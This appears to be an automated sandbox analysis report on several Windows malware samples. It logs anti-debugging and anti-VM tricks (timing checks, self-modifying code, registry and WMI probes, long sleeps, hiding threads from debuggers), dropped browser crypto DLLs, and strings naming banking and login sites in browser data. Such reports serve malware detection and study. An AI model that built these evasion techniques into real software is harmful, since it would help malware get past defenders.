Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6AE24 second address: A6AEAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 je 00007F528074EBDCh 0x0000000d jne 00007F528074EBD6h 0x00000013 popad 0x00000014 push eax 0x00000015 jns 00007F528074EBE8h 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F528074EBD8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F528074EBD8h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1D62h] 0x00000058 push 00000000h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jno 00007F528074EBD8h 0x00000063 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6CDC7 second address: A6CDCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6CDCD second address: A6CDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6EE6A second address: A6EE6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6EF16 second address: A6EF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A6FF96 second address: A6FFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5A067 second address: A5A06D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A7328E second address: A73292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A73292 second address: A7329E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007F528074EBD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	RDTSC instruction interceptor: First address: A5AA7C second address: A5AA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F528105F326h 0x00000011 popad 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7FC33 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1124AAE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 112358F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7D61E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7FB98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 1137ECC instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Special instruction interceptor: First address: A4D6AB instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Special instruction interceptor: First address: 8AEC2C instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Special instruction interceptor: First address: AD2DFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 36D6AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 1CEC2C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 3F2DFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: ECFC33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: 1074AAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: 107358F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: ECD61E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: ECFB98 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Special instruction interceptor: First address: 1087ECC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: D4DEBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: D4DFCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: EFA734 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: F26EEA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: F93CBB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Special instruction interceptor: First address: D52E95 instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 4900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 4AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 6AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 56B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 55F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5560000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Memory allocated: 5560000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

Code function: 21_2_04A10D28 rdtsc

21_2_04A10D28

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Window / User API: threadDelayed 430

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 0.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 6128	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6188	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6188	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6656	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1352	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6604	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5908	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2968	Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2968	Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036	Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep count: 430 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -12900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6984	Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6984	Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5796	Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5796	Thread sleep time: -84042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4672	Thread sleep count: 69 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4672	Thread sleep time: -138069s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7392	Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7392	Thread sleep time: -136068s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8280	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6304	Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6304	Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe TID: 8160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe TID: 2860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe TID: 7852	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C65C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

0_2_6C65C930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000017.00000002.3289822715.000000000034D000.00000040.00000001.01000000.0000000E.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849755351.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2991118053.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001C.00000002.3076107612.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3070181254.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001E.00000002.3139806490.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000002.3271207100.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Web Data.8.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Web Data.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000002.2546281725.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0cc%SystemRoot%\system32\mswsock.dll
Source: Web Data.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2546281725.0000000000630000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.0000000001749000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000171B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware3
Source: Web Data.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Web Data.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.8.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000002.2546281725.0000000000630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: Web Data.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareda
Source: Web Data.8.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2547827594.0000000001106000.00000040.00000001.01000000.00000003.sdmp, DocumentsHCFBFBAEBK.exe, 00000015.00000002.2628190504.0000000000A2D000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.2647299566.000000000034D000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3289822715.000000000034D000.00000040.00000001.01000000.0000000E.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849755351.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2991118053.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001C.00000002.3076107612.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3070181254.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001E.00000002.3139806490.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000002.3271207100.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Web Data.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Web Data.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

Code function: 21_2_04A10BED Start: 04A10BF7 End: 04A10C01

21_2_04A10BED

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
